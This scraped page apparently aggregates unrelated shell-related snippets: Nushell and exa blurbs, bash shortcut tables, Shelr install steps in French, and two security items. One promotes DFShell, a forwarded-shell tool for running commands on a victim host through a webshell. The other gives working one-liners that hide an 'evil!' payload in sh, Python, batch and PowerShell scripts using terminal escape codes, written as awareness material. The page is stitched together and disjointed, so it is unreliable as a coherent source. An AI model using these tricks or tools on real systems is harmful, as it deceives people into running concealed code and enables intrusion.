Nushell
A new type of shell.
Pipelines to control any OS
Nu works on Linux, macOS, BSD, and Windows. Learn it once, then use it anywhere.
Everything is data
Nu pipelines use structured data so you can safely select, filter, and sort the same way every time. Stop parsing strings and start solving problems.
Powerful plugins
It's easy to extend Nu using a powerful plugin system.
Introduction
exa is a modern replacement for the command-line program ls that ships with Unix and Linux operating systems. This command is used by terminal users, administrators, and developers hundreds of times daily, as well as being useful when writing automated scripts.
Unfortunately, these two uses are at odds with each other. While users want new features and customisation, administrators would prefer the stability of a long-lived and ubiquitous tool.
By deliberately making some decisions differently, exa attempts to be a more featureful, more user-friendly version of ls.
DFShell - The Best Forwarded Shell
2 hrs ago 8:30 AM | Post sponsored by FaradaySEC | Multiuser Pentest Environment Zion3R
██████╗ ███████╗███████╗██╗ ██╗███████╗██╗ ██╗
██╔══██╗██╔════╝██╔════╝██║ ██║███╔═══╝██║ ██║
██║ ██║█████╗ ███████╗███████║█████╗ ██║ ██║
██║ ██║██╔══╝ ╚════██║██╔══██║██╔══╝ ██║ ██║
██████╔╝██║ ███████║██║ ██║███████╗████████╗███████╗
╚═════╝ ╚═╝ ╚══════╝╚═╝ ╚═╝╚══════╝╚══════╝╚══════╝
D3Ext's Forwarded Shell it's a python3 script which use mkfifo to simulate a shell into the victim machine. It creates a hidden directory in /dev/shm/.fs/ and there are stored the fifos. You can even have a tty over a webshell.
In case you want a good webshell with code obfuscation, login panel and more functions you have this webshell (scripted by me), you can change the username and the password at the top of the file, it also have a little protection in case of beeing discovered because if the webshell is accessed from localhost it gives a 404 status code
Why you should use DFShell?
To use other forwarded shells you have to edit the script to change the url and the parameter of the webshell, but DFShell use parameters to quickly pass the arguments to the script (-u/--url and -p/--parameter), the script have a pretty output with colors, you also have custom commands to upload and download files from the target, do port and host discovery, and it deletes the files created on the victim if you press Ctrl + C or simply exit from the shell.
If you change the actual user from webshell (or anything get unstable) then execute: 'sh'
Welcome
Welcome to the learnshell.org interactive Shell Programming tutorial.
Whether you are an experienced programmer or not, this website is intended for everyone who wishes to learn programming with Unix/Linux shell interpreters.
You are welcome to join our group on Facebook for questions, discussions and updates.
Just click on the chapter you wish to begin from, and follow the instructions. Good luck!
fzf: comment optimiser son utilisation de la ligne de commande
Shell script escape injection
echo -e '#!/bin/sh\n\necho "evil!"\nexit 0\n\033[2Aecho "Hello World!"\n' > script.sh
chmod a+x script.sh
The resulting script.sh will then work on (has been tested on):
Linux (gnome-terminal, xterm, aterm)
Mac OS (Terminal 2.0, iTerm2)
Cygwin (Windows)
Python script escape injection
echo -e '#!/usr/bin/python\n\nprint "evil!";\nexit(0);\n#\033[2A\033[1Dprint "Hello World!";\n' > script.py
chmod a+x script.py
The resulting script.py will then work on (has been tested on):
Linux (gnome-terminal, xterm, aterm)
Mac OS (Terminal 2.0, iTerm2)
Cygwin (Windows)
Batch (Command Prompt) escape injection
echo -e '@echo off\n\r\n\recho evil!\r\n::\033[2D \033[A\033[2Decho Hello World!' > script.bat
The resulting script.bat will then work on (has been tested on):
Windows 10 PowerShell
Windows 10 Command Prompt
PS1 (PowerShell) escape injection
echo -e 'write-host "evil!"\r\n#\033[A\033[2Dwrite-host "Hello World!"' > script.ps1
The resulting script.ps1 will then work on (has been tested on):
Windows 10 PowerShell
Windows 10 Command Prompt
Conclusion
As we have seen in this article, terminal escape injections affect practically every modern operating system environment and they can be really nasty.
As infosec professionals, we should know about them and keep our guards up when it matters. Hopefully this article provided enough information to stay safe.
Please feel free to let us know in the comment section your thoughts.
1. Controlling processes
2. While typing commands
3. Correcting text
4. Moving
5. Cut / paste
6. Controlling the terminal
7. Bonus
In Bash and ZSH default key shortcuts are emacs style, a vim style exists.
20 raccourcis clavier du shell (Bash, ZSh) en mode emacs le réglage par défaut. Un mode vim existe.
Keys Description
CTRL+C Close the process running in foreground
CTRL+Z Suspend current process, it goes Zzz
bg command to resume it in background,
fg command to resume it in foreground.
Keys Description
CTRL+R Recall a previous command
TAB Auto-complete files and folder names, also commands and options with ZSH
CTRL+C Clean the line
Keys Description
CTRL+_ Undo the last key press. Can be repeated.
CTRL+T Toggle the last 2 characters;
Alt+T the last 2 words;
Esc+T current word with previous
Keys Description
CTRL+A Go to the begining of the line (like Home) alpha
CTRL+E Go to the end of the line (like End)
Alt+F Move 1 word forward, CTRL+F 1 character
Alt+B Move 1 word backward, CTRL+B 1 character
Keys Description
CTRL+H Cut 1 char before the cursor (like Backspace)
CTRL+W Cut 1 word before the cursor
CTRL+U Cut the part of the line before the cursor (Undo)
CTRL+K Cut the part of the line after the cursor
CTRL+Y Paste (yank) the last cut string
Keys Description
CTRL+S Stop the current output (to read it)
CTRL+Q Quit suspended mode, so resume output.
PgUp to read the begining
<cmd> | less to control output from start.
CTRL+L Clear shell screen, like clear command. Redraw layout
CTRL+D Exit (destroy) the current shell
Keys Description
CTRL+M Alternative to Enter
CTRL+J also works
1. CTRL + A Esc ↑ in a screen, Esc to stop
2. Redraw screen in many console-based app.
Go See it on GitHub
https:// clone URL it to Desktop:
git clone https://github.com/bashawesome/bashunixshell-awesome.git
SSH clone URL it to Desktop:
git clone git@github.com:bashawesome/bashunixshell-awesome.git
Asciinema is a free and open source solution for recording the terminal sessions and sharing them on the web. Read more about how it works.
Shelr propose un outil pour enregistrer, rejouer et diffuser les commandes et leurs résultats saisies dans votre terminal favori (console). L'avantage par rapport à un screencast classique est que le termcast sauvegarde non pas une vidéo mais juste le texte.
Il est possible de fonctionner de manière autonome en gérant vous même vos enregistrements (ce qui peut par exemple être très pratique pour une présentation ou un cours à des élèves). Si vous souhaitez diffusez ces enregistrements sur Internet, il faut passer par le site Shelr.tv: l'inscription prends quelques secondes et l'hébergement de vos termcasts est gratuite.
Cerise sur le gâteau, les outils Shelr sont fournis sont licence GPL v3 dans un GitHub.
Installation Shelr sur votre système
Voici la procédure à suivre sur une distribution Ubuntu. Les seuls pré-requis sont d'avoir ruby et rubugems installés sur son système d'exploitation:
sudo apt-get install ruby rubygems
sudo gem install shelr